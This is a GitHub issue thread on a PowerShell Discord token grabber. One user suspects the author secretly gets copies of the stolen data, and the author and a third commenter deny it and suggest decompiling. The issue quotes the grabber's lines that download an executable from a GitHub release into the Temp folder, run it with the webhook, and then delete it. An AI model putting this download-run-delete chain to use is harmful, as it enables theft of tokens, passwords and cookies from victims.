### ISSUE TITLE
Git owner gets copy of exfil

### ISSUE THREAD

**Issue by aamaanaa** [ChildrenOfYahweh/Powershell-Token-Grabber#122]
See this line:

` (New-Object System.Net.WebClient).DownloadFile("https://github.com/KDot227/Powershell-Token-Grabber/releases/download/V4.2/main.exe", "$env:LOCALAPPDATA\Temp\main.exe")`

its download a exe of the token grabber from the autor, most likely with his own Discord hook.

It then starts it:

`$proc = Start-Process $env:LOCALAPPDATA\Temp\main.exe -ArgumentList "$webhook" -NoNewWindow -PassThru`

After execution, the exe from the auto will be removed:

`Remove-Item "$main_temp\main.exe" -Force`

My advice is to check the code of the script, make sure that it is safe and working, and there is no double exfils.

**NEVER BLINDY TRUST ANY GIT PROJECT CODE! ALWAYS CHECK THE SOURCE CODE!**

**Comment by KDot227** [comment]
> See this line:
> 
> ` (New-Object System.Net.WebClient).DownloadFile("https://github.com/KDot227/Powershell-Token-Grabber/releases/download/V4.2/main.exe", "$env:LOCALAPPDATA\Temp\main.exe")`
> 
> its download a exe of the token grabber from the autor, most likely with his own Discord hook.
> 
> It then starts it:
> 
> `$proc = Start-Process $env:LOCALAPPDATA\Temp\main.exe -ArgumentList "$webhook" -NoNewWindow -PassThru`
> 
> After execution, the exe from the auto will be removed:
> 
> `Remove-Item "$main_temp\main.exe" -Force`
> 
> My advice is to check the code of the script, make sure that it is safe and working, and there is no double exfils.
> 
> **NEVER BLINDY TRUST ANY GIT PROJECT CODE! ALWAYS CHECK THE SOURCE CODE!**

It's TOTALLY not like the author also didn't prepare for someone to say this and would make videos of him compiling it and also not using obfuscation so people like you could easily decompile it or read the byte code. But idk author must be a skid.

**Comment by KDot227** [comment]
so before u start claiming any of this is true show some reasonable proof.

**Comment by aamaanaa** [comment]
https://i.imgur.com/5Za04C1.png

forgive me, but it seems kinda sus... looks a lot like the python version of the grabber and the Google Chrome and other words....

> It's TOTALLY not like the author also didn't prepare for someone to say this and would make videos of him compiling it and also not using obfuscation so people like you could easily decompile it or read the byte code. But idk author must be a skid.

i like that the code is free available to anyone to read tho!

**Comment by KDot227** [comment]
> https://i.imgur.com/5Za04C1.png
> 
> forgive me, but it seems kinda sus... looks a lot like the python version of the grabber and the Google Chrome and other words....
> 
> > It's TOTALLY not like the author also didn't prepare for someone to say this and would make videos of him compiling it and also not using obfuscation so people like you could easily decompile it or read the byte code. But idk author must be a skid.
> 
> i like that the code is free available to anyone to read tho!
> 
> but idk, maybe im just a complete moron and i do not understand anything at all :)

That's because it literally is and it says that in the readme I believe. It is because you literally can't grab the users tokens in powershell due AES not being fully supported until powershell 7. So in order to actually grab tokens and passwords and cookies you need a separate file. But, like I said be my guest and decompile or debug all u want. Truth is there isn't anything bad in it.

**Comment by LocalSmail223** [comment]
If you look at the code for both the powershell and the python file there is ONLY an Anti-Debug within the powershell however there isnt one within the python file. This means you can download the exe and parse it into an File Analysis tool like Virus total or Hydra or any other that you may prefer. I am in no way protecting or fighting with the developer as I have seen other developers do the same shit but I am doubtful that he him self is.

 I am also just saying this so that children like you start to use their brain when it comes to open source loggers and pre-compiled exes with their own safety. It is funny when kids make shit like this up but then it also can cause unnecessary drama. I have had kids accuse me of dual hooking shit before and it gets super fucking annoying. 

Use your brain <3.

PS: Using a text editor to look through a compiled file wont tell you shit especially if they add a single lay of obfuscation. It wont matter if it is weak or strong, base64 or zlib compression you can stop you in your tracks from that. So you best look for a decompiler for .pyc files :kiss:

**Comment by KDot227** [comment]
> 

^^^

**Comment by aamaanaa** [comment]
well i must be a complete moron then...
